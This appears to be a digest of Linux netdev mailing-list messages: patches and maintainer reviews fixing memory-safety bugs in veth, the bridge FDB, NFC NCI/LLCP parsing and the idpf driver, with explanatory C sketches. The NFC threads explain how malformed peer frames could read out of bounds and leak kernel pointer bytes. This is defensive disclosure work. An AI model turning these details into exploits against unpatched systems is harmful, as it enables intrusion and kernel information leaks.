> veth_xdp+0x48e/0x730 drivers/net/veth.c:1717
> dev_xdp_propagate+0x125/0x260 net/core/dev_api.c:348
> bond_xdp_set drivers/net/bonding/bond_main.c:5715 [inline]
> bond_xdp+0x3ca/0x830 drivers/net/bonding/bond_main.c:5761
> dev_xdp_install+0x42c/0x600 net/core/dev.c:10387
> dev_xdp_detach_link net/core/dev.c:10579 [inline]
> bpf_xdp_link_release+0x362/0x540 net/core/dev.c:10595
> bpf_link_free+0x103/0x480 kernel/bpf/syscall.c:3292
> bpf_link_put_direct kernel/bpf/syscall.c:3344 [inline]
> bpf_link_release+0x6b/0x80 kernel/bpf/syscall.c:3351
> __fput+0x44f/0xa70 fs/file_table.c:469
> task_work_run+0x1d9/0x270 kernel/task_work.c:233
The BQL reset loop in veth_napi_del_range() iterates over
dev->real_num_rx_queues but indexes into the peer's TX queues,
which goes out of bounds when the peer has fewer TX queues
(e.g. a veth enslaved to a bond with XDP).
The fix is to clamp the loop to the peer's real_num_tx_queues.
Will be included in the V3 submission.
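For readers following along, a minimal userspace sketch of the clamp (not the driver code). `struct fake_netdev`, `get_tx_queue()` and `reset_peer_tx_range()` are hypothetical stand-ins, and the assert() models the `index >= dev->num_tx_queues` warning from netdevice.h. Only the min() clamp mirrors the diff that follows.

```c
#include <assert.h>

/* Hypothetical stand-in for the few net_device fields the loop touches. */
struct fake_netdev {
	unsigned int real_num_tx_queues;
	unsigned int num_tx_queues;
	unsigned int resets[8]; /* per-queue reset counter, for illustration */
};

static int min_int(int a, int b)
{
	return a < b ? a : b;
}

/* Models the netdev_get_tx_queue() check: index must be below num_tx_queues. */
static unsigned int *get_tx_queue(struct fake_netdev *dev, int i)
{
	assert((unsigned int)i < dev->num_tx_queues);
	return &dev->resets[i];
}

/* Reset the peer's TX queues in [start, end), clamped to what the peer has. */
static int reset_peer_tx_range(struct fake_netdev *peer, int start, int end)
{
	int peer_end = min_int(end, (int)peer->real_num_tx_queues);
	int i, n = 0;

	for (i = start; i < peer_end; i++) {
		(*get_tx_queue(peer, i))++;
		n++;
	}
	return n;
}
```

Clamping, rather than skipping the loop whenever the counts differ, still resets the queues the peer actually has.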
#syz test
---
drivers/net/veth.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/veth.c b/drivers/net/veth.c
index 911e7e36e166..9d7b085c9548 100644
--- a/drivers/net/veth.c
+++ b/drivers/net/veth.c
@@ -1138,7 +1138,9 @@ static void veth_napi_del_range(struct net_device *dev, int start, int end)
*/
peer = rtnl_dereference(priv->peer);
if (peer) {
- for (i = start; i < end; i++)
+ int peer_end = min(end, (int)peer->real_num_tx_queues);
+
+ for (i = start; i < peer_end; i++)
netdev_tx_reset_queue(netdev_get_tx_queue(peer, i));
}
[-- Attachment #2: repro-syzbot-veth-bql.sh --]
[-- Type: application/x-shellscript, Size: 2967 bytes --]
* Re: [PATCH net 1/1] net: bridge: use a stable FDB dst snapshot in RCU readers
From: Ido Schimmel @ 2026-04-14 8:05 UTC
To: Ren Wei
Cc: bridge, netdev, razor, davem, edumazet, kuba, pabeni, horms,
makita.toshiaki, vyasevic, yifanwucs, tomapufckgml, yuantan098,
bird, enjou1224z, zcliangcn
In-Reply-To: <6570fabb85ecadb8baaf019efe856f407711c7b9.1776043229.git.zcliangcn@gmail.com>
On Mon, Apr 13, 2026 at 05:08:46PM +0800, Ren Wei wrote:
> From: Zhengchuan Liang <zcliangcn@gmail.com>
>
> Local FDB entries can be rewritten in place by `fdb_delete_local()`, which
> updates `f->dst` to another port or to `NULL` while keeping the entry
> alive. Several bridge RCU readers inspect `f->dst`, including
> `br_fdb_fillbuf()` through the `brforward_read()` sysfs path.
>
> These readers currently load `f->dst` multiple times and can therefore
> observe inconsistent values across the check and later dereference.
> In `br_fdb_fillbuf()`, this means a concurrent local-FDB update can change
> `f->dst` after the NULL check and before the `port_no` dereference,
> leading to a NULL-ptr-deref.
>
> Fix this by taking a single `READ_ONCE()` snapshot of `f->dst` in each
> affected RCU reader and using that snapshot for the rest of the access
> sequence. Also publish the in-place `f->dst` updates in `fdb_delete_local()`
> with `WRITE_ONCE()` so the readers and writer use matching access patterns.
Sashiko is complaining [1] about missing READ_ONCE() annotations in some
places, but I can handle them in net-next in a similar fashion to commit
3e19ae7c6fd6 ("net: bridge: use READ_ONCE() and WRITE_ONCE() compiler
barriers for fdb->dst").
It's also complaining [2] about a pre-existing, not very interesting
possible bug in br_fdb_dump().
>
> Fixes: 960b589f86c7 ("bridge: Properly check if local fdb entry can be deleted in br_fdb_change_mac_address")
> Cc: stable@kernel.org
> Reported-by: Yifan Wu <yifanwucs@gmail.com>
> Reported-by: Juefei Pu <tomapufckgml@gmail.com>
> Co-developed-by: Yuan Tan <yuantan098@gmail.com>
> Signed-off-by: Yuan Tan <yuantan098@gmail.com>
> Suggested-by: Xin Liu <bird@lzu.edu.cn>
> Tested-by: Ren Wei <enjou1224z@gmail.com>
> Signed-off-by: Zhengchuan Liang <zcliangcn@gmail.com>
> Signed-off-by: Ren Wei <n05ec@lzu.edu.cn>
Reviewed-by: Ido Schimmel <idosch@nvidia.com>
[1]
"
Are there other RCU readers that still need this protection?
For instance, in br_dev_xmit(), br_fdb_find_rcu() returns a local FDB entry
which is then passed to br_forward(). If a concurrent fdb_delete_local()
sets the entry's dst to NULL, could this cause a NULL pointer dereference if
br_forward() is inlined and the compiler emits multiple loads?
Similarly, br_handle_frame_finish() appears to perform an unmarked read of
dst->dst, which might race with br_fdb_update().
Also, in br_fdb_delete_by_port(), f->dst is read directly without
READ_ONCE(). While called under br->hash_lock, the br_fdb_update()
fast path updates f->dst locklessly. Could this trigger KCSAN warnings due
to an unmarked data race?
"
[2]
"
Does passing f to fdb_fill_info() allow a concurrent update to change
the destination port after the filtering check?
fdb_fill_info() executes a new READ_ONCE(fdb->dst). If f->dst changes
between the filter_dev check above and the call to fdb_fill_info(), the
dumped entry might claim to be on a device that doesn't match the requested
filter_dev.
Should fdb_fill_info() be updated to accept the dst snapshot instead?
"
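A userspace sketch of the snapshot pattern from the patch description. `READ_ONCE_SKETCH()` and `WRITE_ONCE_SKETCH()` approximate the kernel macros with a single volatile access (using the GCC/Clang `__typeof__` extension), and `struct fdb_entry`, `fill_port_no()` and `set_dst()` are hypothetical. It shows the access pattern only; it does not reproduce the race.

```c
#include <assert.h>
#include <stddef.h>

/* Approximations of READ_ONCE()/WRITE_ONCE(): one volatile access each. */
#define READ_ONCE_SKETCH(x)     (*(const volatile __typeof__(x) *)&(x))
#define WRITE_ONCE_SKETCH(x, v) (*(volatile __typeof__(x) *)&(x) = (v))

struct port {
	unsigned short port_no;
};

struct fdb_entry {
	struct port *dst; /* may be rewritten in place, or set to NULL */
};

/* Reader: take one snapshot and use it for both the check and the dereference. */
static int fill_port_no(struct fdb_entry *f)
{
	const struct port *dst = READ_ONCE_SKETCH(f->dst);

	if (!dst)
		return 0; /* local entry without a port */
	return dst->port_no;
}

/* Writer: publish the in-place update with a matching marked store. */
static void set_dst(struct fdb_entry *f, struct port *p)
{
	WRITE_ONCE_SKETCH(f->dst, p);
}
```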
* Re: [PATCH net v2 1/3] nfc: nci: fix u8 underflow in nci_store_general_bytes_nfc_dep
From: Paolo Abeni @ 2026-04-14 8:04 UTC
To: Lekë Hapçiu, netdev
Cc: davem, edumazet, kuba, linux-nfc, stable, horms,
Lekë Hapçiu
In-Reply-To: <5a6a95f0-a26c-4eed-9c9a-98e22c3bc682@redhat.com>
On 4/14/26 9:34 AM, Paolo Abeni wrote:
> On 4/9/26 8:59 PM, Lekë Hapçiu wrote:
>> From: Lekë Hapçiu <framemain@outlook.com>
>>
>> nci_store_general_bytes_nfc_dep() computes the number of General Bytes
>> to copy from an ATR_RES or ATR_REQ frame by subtracting a fixed header
>> offset from the peer-supplied length field:
>>
>> ndev->remote_gb_len = min_t(__u8,
>> (atr_res_len - NFC_ATR_RES_GT_OFFSET), /* offset = 15 */
>> NFC_ATR_RES_GB_MAXSIZE);
>>
>> Both length fields are __u8. When a malicious NFC-DEP target (POLL mode)
>> or initiator (LISTEN mode) sends an ATR_RES/ATR_REQ whose length field is
>> smaller than the fixed offset (< 15 or < 14 respectively), the subtraction
>> wraps in unsigned u8 arithmetic:
>>
>> e.g. atr_res_len = 0 -> (u8)(0 - 15) = 241
>>
>> min_t(__u8, 241, 47) then yields 47, so the subsequent memcpy reads
>> 47 bytes from beyond the end of the valid activation parameter data into
>> ndev->remote_gb[]. This buffer is later passed to nfc_llcp_parse_gb_tlv()
>> as a TLV array, feeding directly into the TLV parser hardened by the
>> companion patch.
>>
>> Fix: add an explicit lower-bound check on each length field before the
>> subtraction. If the length is smaller than the required offset the frame
>> is malformed; leave remote_gb_len at zero and skip the memcpy.
>>
>> Both the POLL (atr_res_len / NFC_ATR_RES_GT_OFFSET = 15) and the LISTEN
>> (atr_req_len / NFC_ATR_REQ_GT_OFFSET = 14) paths are affected; both are
>> fixed symmetrically.
>>
>> Reachability: the ATR_RES is sent by an NFC-DEP target during RF
>> activation, before any authentication or pairing. The bug is therefore
>> reachable from any NFC peer within ~4 cm.
>>
>> Fixes: a99903ec4566 ("NFC: NCI: Handle Target mode activation")
>> Cc: stable@vger.kernel.org
>> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
>> ---
>> net/nfc/nci/ntf.c | 22 ++++++++++++++--------
>> 1 file changed, 14 insertions(+), 8 deletions(-)
>>
>> diff --git a/net/nfc/nci/ntf.c b/net/nfc/nci/ntf.c
>> index c96512bb8..8eb295580 100644
>> --- a/net/nfc/nci/ntf.c
>> +++ b/net/nfc/nci/ntf.c
>> @@ -631,25 +631,31 @@ static int nci_store_general_bytes_nfc_dep(struct nci_dev *ndev,
>> switch (ntf->activation_rf_tech_and_mode) {
>> case NCI_NFC_A_PASSIVE_POLL_MODE:
>> case NCI_NFC_F_PASSIVE_POLL_MODE:
>> + if (ntf->activation_params.poll_nfc_dep.atr_res_len <
>> + NFC_ATR_RES_GT_OFFSET)
>> + break;
>
> This does not look the right fix: nci_store_general_bytes_nfc_dep() will
> return success to the caller, and processing will proceed even if the
> packet is malformed.
>
> Looking at the (rather incomplete) error handling in
> nci_rf_intf_activated_ntf_packet(), the latter function should error out
> with EINVAL for truncated/malformed packets.
>
> You should return a proper error code here _and_ handle such error in
> nci_rf_intf_activated_ntf_packet().
>
> The same comment applies to the similar check below.
>
>> ndev->remote_gb_len = min_t(__u8,
>> - (ntf->activation_params.poll_nfc_dep.atr_res_len
>> - - NFC_ATR_RES_GT_OFFSET),
>> + ntf->activation_params.poll_nfc_dep.atr_res_len
>> + - NFC_ATR_RES_GT_OFFSET,
>
> Please do not include style-related changes in 'net' fix: it should
> include the minimal delta to address the issue.
>
> There are other similar chunks below.
I almost forgot: do not send your patches in reply to an older revision: it
fouls patchwork and makes the review process harder, if not impossible.
/P
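A minimal userspace sketch contrasting the wrapping subtraction with a checked version that returns -EINVAL, as suggested in the review. The constants use the values quoted in the patch description (15 and 47); `gb_len_unchecked()` and `store_gb()` are hypothetical helpers, and propagating the error out of nci_rf_intf_activated_ntf_packet() is not shown.

```c
#include <assert.h>
#include <errno.h>
#include <string.h>

#define ATR_RES_GT_OFFSET  15 /* value quoted in the patch description */
#define ATR_RES_GB_MAXSIZE 47 /* value quoted in the patch description */

/* Unchecked form: (u8)(len - 15) wraps to a large value when len < 15. */
static unsigned char gb_len_unchecked(unsigned char atr_res_len)
{
	unsigned char diff = (unsigned char)(atr_res_len - ATR_RES_GT_OFFSET);

	return diff < ATR_RES_GB_MAXSIZE ? diff : ATR_RES_GB_MAXSIZE;
}

/* Checked form: a frame shorter than the offset is malformed, so fail. */
static int store_gb(unsigned char *dst, unsigned char *dst_len,
		    const unsigned char *atr_res, unsigned char atr_res_len)
{
	unsigned char n;

	if (atr_res_len < ATR_RES_GT_OFFSET)
		return -EINVAL; /* leave *dst_len untouched */
	n = atr_res_len - ATR_RES_GT_OFFSET;
	if (n > ATR_RES_GB_MAXSIZE)
		n = ATR_RES_GB_MAXSIZE;
	memcpy(dst, atr_res + ATR_RES_GT_OFFSET, n);
	*dst_len = n;
	return 0;
}
```

Returning an error instead of silently skipping the copy lets the caller stop processing the activation, which is the point of the review comment above.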
* Re: [PATCH net v2 3/3] nfc: llcp: fix TLV parsing OOB and length underflow in nfc_llcp_recv_snl
From: Paolo Abeni @ 2026-04-14 8:02 UTC
To: Lekë Hapçiu, netdev
Cc: davem, edumazet, kuba, linux-nfc, stable, horms,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-4-snowwlake@icloud.com>
On 4/9/26 8:59 PM, Lekë Hapçiu wrote:
> @@ -1300,11 +1305,17 @@ static void nfc_llcp_recv_snl(struct nfc_llcp_local *local,
> sdres_tlvs_len = 0;
>
> while (offset < tlv_len) {
> + if (tlv_len - offset < 2)
> + break;
> type = tlv[0];
> length = tlv[1];
> + if (tlv_len - offset - 2 < length)
> + break;
>
> switch (type) {
> case LLCP_TLV_SDREQ:
> + if (length < 1)
> + break;
> tid = tlv[2];
> service_name = (char *) &tlv[3];
Sashiko noted that you are validating a single additional byte, but the
code reads 2 of them.
/P
* Re: [Intel-wired-lan] [PATCH net] idpf: fix double free and use-after-free in aux device error paths
From: Greg Kroah-Hartman @ 2026-04-14 8:00 UTC
To: Paul Menzel
Cc: intel-wired-lan, netdev, linux-kernel, Tony Nguyen,
Przemek Kitszel, Andrew Lunn, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, stable
In-Reply-To: <afefe8b5-5bd9-4019-9d12-5ee2a7f577a2@molgen.mpg.de>
On Tue, Apr 14, 2026 at 08:54:55AM +0200, Paul Menzel wrote:
> Dear Greg,
>
>
> Thank you for the patch.
>
> Am 11.04.26 um 12:12 schrieb Greg Kroah-Hartman:
> > When auxiliary_device_add() fails in idpf_plug_vport_aux_dev() or
> > idpf_plug_core_aux_dev(), the err_aux_dev_add label calls
> > auxiliary_device_uninit() and falls through to err_aux_dev_init. The
> > uninit call will trigger put_device(), which invokes the release
> > callback (idpf_vport_adev_release / idpf_core_adev_release) that frees
> > iadev. The fall-through then reads adev->id from the freed iadev for
> > ida_free() and double-frees iadev with kfree().
> >
> > Free the IDA slot and clear the back-pointer before uninit, while adev
> > is still valid, then return immediately.
> >
> > Commit 65637c3a1811 65637c3a1811 ("idpf: fix UAF in RDMA core aux dev
>
> The commit hash is pasted twice.
Argh, when I cut/paste from my terminal that happened, my fault.
> > deinitialization") fixed the same use-after-free in the matching unplug
> > path in this file but missed both probe error paths.
> >
> > Cc: Tony Nguyen <anthony.l.nguyen@intel.com>
> > Cc: Przemek Kitszel <przemyslaw.kitszel@intel.com>
> > Cc: Andrew Lunn <andrew+netdev@lunn.ch>
> > Cc: "David S. Miller" <davem@davemloft.net>
> > Cc: Eric Dumazet <edumazet@google.com>
> > Cc: Jakub Kicinski <kuba@kernel.org>
> > Cc: Paolo Abeni <pabeni@redhat.com>
> > Cc: stable <stable@kernel.org>
> > Fixes: be91128c579c ("idpf: implement RDMA vport auxiliary dev create, init, and destroy")
> > Fixes: f4312e6bfa2a ("idpf: implement core RDMA auxiliary dev create, init, and destroy")
> > Assisted-by: gregkh_clanker_t1000
> > Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
> > ---
> > Note, these cleanup paths are messy, but I couldn't see a simpler way
> > without a lot more rework, so I chose the simple way :)
> >
> > drivers/net/ethernet/intel/idpf/idpf_idc.c | 6 ++++++
> > 1 file changed, 6 insertions(+)
> >
> > diff --git a/drivers/net/ethernet/intel/idpf/idpf_idc.c b/drivers/net/ethernet/intel/idpf/idpf_idc.c
> > index 7e4f4ac92653..b7d6b08fc89e 100644
> > --- a/drivers/net/ethernet/intel/idpf/idpf_idc.c
> > +++ b/drivers/net/ethernet/intel/idpf/idpf_idc.c
> > @@ -90,7 +90,10 @@ static int idpf_plug_vport_aux_dev(struct iidc_rdma_core_dev_info *cdev_info,
> > return 0;
> > err_aux_dev_add:
> > + ida_free(&idpf_idc_ida, adev->id);
> > + vdev_info->adev = NULL;
> > auxiliary_device_uninit(adev);
> > + return ret;
> > err_aux_dev_init:
> > ida_free(&idpf_idc_ida, adev->id);
> > err_ida_alloc:
> > @@ -228,7 +231,10 @@ static int idpf_plug_core_aux_dev(struct iidc_rdma_core_dev_info *cdev_info)
> > return 0;
> > err_aux_dev_add:
> > + ida_free(&idpf_idc_ida, adev->id);
> > + cdev_info->adev = NULL;
> > auxiliary_device_uninit(adev);
> > + return ret;
> > err_aux_dev_init:
> > ida_free(&idpf_idc_ida, adev->id);
> > err_ida_alloc:
>
> Reviewed-by: Paul Menzel <pmenzel@molgen.mpg.de>
>
> gemini/gemini-3.1-pro-preview has two comments [1]. Maybe the driver
> developers could judge their relevance.
These "pre-existing" reports are getting annoying. While they are nice
to see for driver authors, it makes developers sending bug fixes in feel
like they are forced to do "more". I think they are trying to tune this
to be a bit more sane...
thanks,
greg k-h
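A userspace sketch of the unwind order in the fix, with hypothetical names throughout: `dev_uninit()` stands in for auxiliary_device_uninit() dropping the last reference, and `release()` for the release callback that frees the containing object. Everything that reads `w` happens before the uninit call, and the function returns instead of falling through to the label that would free `w` a second time.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical bookkeeping so the unwind order can be checked. */
static int ids_in_use;
static int objects_freed;

struct aux_dev {
	int id;
};

struct wrapper { /* plays the role of iadev */
	struct aux_dev adev;
};

static struct aux_dev *backptr; /* plays the role of the ->adev back-pointer */

static int id_alloc(void) { ids_in_use++; return 42; }
static void id_free(int id) { (void)id; ids_in_use--; }

/* Models the release callback: the last put frees the containing object. */
static void release(struct wrapper *w)
{
	objects_freed++;
	free(w);
}

/* Models the uninit call dropping the last reference. */
static void dev_uninit(struct wrapper *w)
{
	release(w);
}

/* init_fails/add_fails simulate the init and add steps returning errors. */
static int plug(int init_fails, int add_fails)
{
	struct wrapper *w;
	int ret = -1;

	w = calloc(1, sizeof(*w));
	if (!w)
		return -1;
	w->adev.id = id_alloc();

	if (init_fails)
		goto err_init;
	backptr = &w->adev;

	if (add_fails)
		goto err_add;
	return 0;

err_add:
	id_free(w->adev.id); /* read w while it is still valid */
	backptr = NULL;
	dev_uninit(w);       /* release() frees w */
	return ret;          /* must not fall through into err_init */
err_init:
	id_free(w->adev.id);
	free(w);
	return ret;
}
```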
* [PATCH net-next] MAINTAINERS: Add netkit selftest files
From: Daniel Borkmann @ 2026-04-14 7:52 UTC
To: netdev; +Cc: kuba, dw, pabeni, razor
The following selftest files are related to netkit and should have
netkit folks in Cc for review:
- tools/testing/selftests/bpf/prog_tests/tc_netkit.c
- tools/testing/selftests/drivers/net/hw/nk_qlease.py
- tools/testing/selftests/net/nk_qlease.py
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
---
[ on top of https://lore.kernel.org/netdev/20260413220809.604592-1-daniel@iogearbox.net/ ]
MAINTAINERS | 3 +++
1 file changed, 3 insertions(+)
diff --git a/MAINTAINERS b/MAINTAINERS
index 65902b97f5df..fa1bdb1db73e 100644
--- a/MAINTAINERS
+++ b/MAINTAINERS
@@ -4901,6 +4901,9 @@ L: netdev@vger.kernel.org
S: Supported
F: drivers/net/netkit.c
F: include/net/netkit.h
+F: tools/testing/selftests/bpf/prog_tests/tc_netkit.c
+F: tools/testing/selftests/drivers/net/hw/nk_qlease.py
+F: tools/testing/selftests/net/nk_qlease.py
BPF [NETWORKING] (struct_ops, reuseport)
M: Martin KaFai Lau <martin.lau@linux.dev>
--
2.43.0
* Re: [PATCH net v2 2/3] nfc: llcp: add TLV length bounds checks in parse_gb_tlv and parse_connection_tlv
From: Paolo Abeni @ 2026-04-14 7:52 UTC
To: Lekë Hapçiu, netdev
Cc: davem, edumazet, kuba, linux-nfc, stable, horms,
Lekë Hapçiu
In-Reply-To: <20260409185958.1821242-3-snowwlake@icloud.com>
On 4/9/26 8:59 PM, Lekë Hapçiu wrote:
> From: Lekë Hapçiu <framemain@outlook.com>
>
> v1 of this fix promoted `offset` from u8 to u16 in both TLV parsers,
> preventing the infinite loop when a connection TLV array exceeds 255 bytes.
> During review, Simon Horman identified two additional issues that the u16
> promotion alone does not address.
>
> Issue 1 - truncated TLV header:
>
> The loop guard `offset < tlv_array_len` is not sufficient to guarantee
> that reading tlv[0] (type) and tlv[1] (length) is safe. When exactly
> one byte remains (offset == tlv_array_len - 1) the loop body reads
> tlv[1] one byte past the end of the array.
>
> Issue 2 - peer-controlled `length` field:
>
> `length` is read from peer-supplied frame data and is not checked against
> the remaining array space before advancing `tlv` and `offset`:
>
> offset += length + 2; /* always */
> tlv += length + 2; /* may now point past buffer end */
>
> A crafted `length` advances `tlv` past the array boundary; the following
> iteration reads tlv[0]/tlv[1] from adjacent kernel memory.
>
> For nfc_llcp_parse_gb_tlv() this is particularly impactful: its input is
> &local->remote_gb[3], a field within nfc_llcp_local. A large `length`
> can walk `tlv` into adjacent struct fields including sdreq_timer and
> sdreq_timeout_work which contain kernel function pointers at approximately
> +176 and +216 bytes past remote_gb[]. The parsed `type` byte at those
> positions may match a recognized TLV type causing the parser to store
> bytes from the function pointer into local->remote_miu, which is
> subsequently readable via getsockopt().
>
> Issue 3 - zero-length TLV value:
>
> The llcp_tlv8() and llcp_tlv16() accessor helpers read tlv[2] and
> tlv[2..3] respectively. The outer guard guarantees `length` bytes of
> value are available past the two-byte header, but when length == 0 it
> only guarantees offset+2 <= tlv_array_len (non-strict), leaving tlv[2]
> out of bounds. Per-type minimum-length checks are required before each
> accessor call. Note: llcp_tlv8/16 additionally validate against the
> llcp_tlv_length[] table, providing a second safety layer; the per-type
> checks here make the rejection explicit and avoid silent zero-defaults.
>
> Fix: add two loop-level guards inside each parsing loop:
>
> if (tlv_array_len - offset < 2) /* need type + length */
> break;
> [read type, length]
> if (tlv_array_len - offset - 2 < length) /* need length value bytes */
> break;
>
> Both subtractions are safe: the loop condition guarantees offset <
> tlv_array_len; the first guard then guarantees the difference is >= 2,
> making the second subtraction non-negative.
>
> Add per-type minimum-length checks before each accessor call:
> - tlv8-based (VERSION, LTO, OPT, RW): require length >= 1
> - tlv16-based (MIUX, WKS): require length >= 2
>
> Reachability: nfc_llcp_parse_connection_tlv() is reached on receipt of a
> CONNECT or CC PDU before any connection is established.
> nfc_llcp_parse_gb_tlv() is reached during ATR_RES processing. Both are
> triggerable from any NFC peer within ~4 cm with no authentication.
It would be helpful if you could condense the above text into a
significantly shorter form. Also, it looks like the issue addressed by v1
is no longer addressed here.
>
> Reported-by: Simon Horman <horms@kernel.org>
> Fixes: 7a06e586b9bf ("NFC: Move LLCP receiver window value to socket structure")
> Cc: stable@vger.kernel.org
> Signed-off-by: Lekë Hapçiu <framemain@outlook.com>
> ---
> net/nfc/llcp_commands.c | 22 ++++++++++++++++++++++
> 1 file changed, 22 insertions(+)
>
> diff --git a/net/nfc/llcp_commands.c b/net/nfc/llcp_commands.c
> index 6937dcb3b..7cc237a6d 100644
> --- a/net/nfc/llcp_commands.c
> +++ b/net/nfc/llcp_commands.c
> @@ -202,25 +202,39 @@ int nfc_llcp_parse_gb_tlv(struct nfc_llcp_local *local,
> return -ENODEV;
>
> while (offset < tlv_array_len) {
> + if (tlv_array_len - offset < 2)
> + break;
> type = tlv[0];
> length = tlv[1];
> + if (tlv_array_len - offset - 2 < length)
> + break;
I *think* it would be better to bail out with an error, instead of
silently returning success. A similar consideration applies to the other
checks below.
>
> pr_debug("type 0x%x length %d\n", type, length);
>
> switch (type) {
> case LLCP_TLV_VERSION:
> + if (length < 1)
> + break;
> local->remote_version = llcp_tlv_version(tlv);
> break;
> case LLCP_TLV_MIUX:
> + if (length < 2)
> + break;
You can probably consolidate all the `length < 1` checks into the previous
one (before the switch statement) and add only the `length < 2` check here.
/P
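A sketch of the loop shape discussed above, assuming every recognized type needs at least one value byte (so that check is hoisted before the switch) and that malformed input should fail with -EINVAL rather than silently succeed. `parse_tlv()`, the type codes and `struct remote_params` are hypothetical; the real MIUX masking and the llcp_tlv8()/llcp_tlv16() helpers are not reproduced.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical TLV type codes, for illustration only. */
enum { TLV_VERSION = 1, TLV_MIUX = 2 };

struct remote_params {
	uint8_t version;
	uint16_t miux;
};

/*
 * Walk a TLV array, rejecting truncated headers, values that run past the
 * end of the array, and values too short for their type.
 */
static int parse_tlv(const uint8_t *tlv, size_t len, struct remote_params *p)
{
	size_t offset = 0;

	while (offset < len) {
		uint8_t type, length;

		if (len - offset < 2)          /* need type + length */
			return -EINVAL;
		type = tlv[0];
		length = tlv[1];
		if (len - offset - 2 < length) /* value must fit in the array */
			return -EINVAL;
		if (length < 1)                /* consolidated minimum-length check */
			return -EINVAL;

		switch (type) {
		case TLV_VERSION:
			p->version = tlv[2];
			break;
		case TLV_MIUX:
			if (length < 2)        /* 16-bit value needs two bytes */
				return -EINVAL;
			p->miux = (uint16_t)((tlv[2] << 8) | tlv[3]);
			break;
		default:
			break;                 /* unknown types are skipped */
		}

		offset += 2 + (size_t)length;
		tlv += 2 + (size_t)length;
	}
	return 0;
}
```

Because `offset` is a size_t and both guards run before `tlv` advances, the pointer can never step past the end of the array, whatever `length` the peer sends.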
* Re: [PATCH net-next v2 0/3] Follow-ups to nk_qlease net selftests
From: Daniel Borkmann @ 2026-04-14 7:51 UTC
To: Jakub Kicinski; +Cc: netdev, dw, pabeni, razor
In-Reply-To: <255394e2-fe42-4e3a-834b-42a0c7153f28@iogearbox.net>
On 4/14/26 9:33 AM, Daniel Borkmann wrote:
> On 4/14/26 4:12 AM, Jakub Kicinski wrote:
>> On Tue, 14 Apr 2026 00:08:03 +0200 Daniel Borkmann wrote:
>>> This is a set of follow-ups addressing [0]:
>>>
>>> - Split netdevsim tests from HW tests in nk_qlease and move the SW
>>> tests under selftests/net/
>>> - Remove multiple ksft_run()s to fix the recently enforced hard-fail
>>> - Move all the setup inside the test cases for the ones under
>>> selftests/net/ (I'll defer the HW ones to David)
>>> - Add more test coverage related to queue leasing behavior and corner
>>> cases, so now we have 45 tests in nk_qlease.py with netdevsim
>>> which does not need special HW
>>
>> LGTM, thanks!
>>
>> I'll let it run overnight in the CI to shake out any latent flakiness
>> (and the crash which I think is from Stan's series).
>>
>> Could you cook up one more follow up to enable VETH in the config?
>> We're getting:
>>
>> # # Exception| Traceback (most recent call last):
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/ksft.py", line 420, in ksft_run
>> # # Exception| func(*args)
>> # # Exception| ~~~~^^^^^^^
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/drivers/net/hw/./nk_qlease.py", line 393, in test_veth_queue_create
>> # # Exception| ip("link add veth0 type veth peer name veth1")
>> # # Exception| ~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 238, in ip
>> # # Exception| return tool('ip', args, json=json, host=host)
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 225, in tool
>> # # Exception| cmd_obj = cmd(cmd_str, ns=ns, host=host)
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 91, in __init__
>> # # Exception| self.process(terminate=False, fail=fail, timeout=timeout)
>> # # Exception| ~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>> # # Exception| File "/srv/vmksft/testing/wt-24/tools/testing/selftests/net/lib/py/utils.py", line 117, in process
>> # # Exception| raise CmdExitFailure("Command failed", self)
>> # # Exception| net.lib.py.utils.CmdExitFailure: Command failed
>> # # Exception| CMD: ip link add veth0 type veth peer name veth1
>> # # Exception| EXIT: 2
>> # # Exception| STDERR: Error: Unknown device type.
>> # # Exception|
>> # not ok 27 nk_qlease.test_veth_queue_create
>>
>> I guess you can post it without waiting for this to be merged, it won't
>> conflict.
>
> Ack, will take a look! Thanks!
After this series here, there is no veth test left anymore under
tools/testing/selftests/drivers/net/hw/ and they moved over to the
tools/testing/selftests/net/nk_qlease.py which already has the needed
CONFIG_VETH=y (in tools/testing/selftests/net/config).
Stan's series was run without this series in the tree, so adding
CONFIG_VETH=y to tools/testing/selftests/drivers/net/hw/config would be
unnecessary; I presume we don't want to add it in that case.
Thanks,
Daniel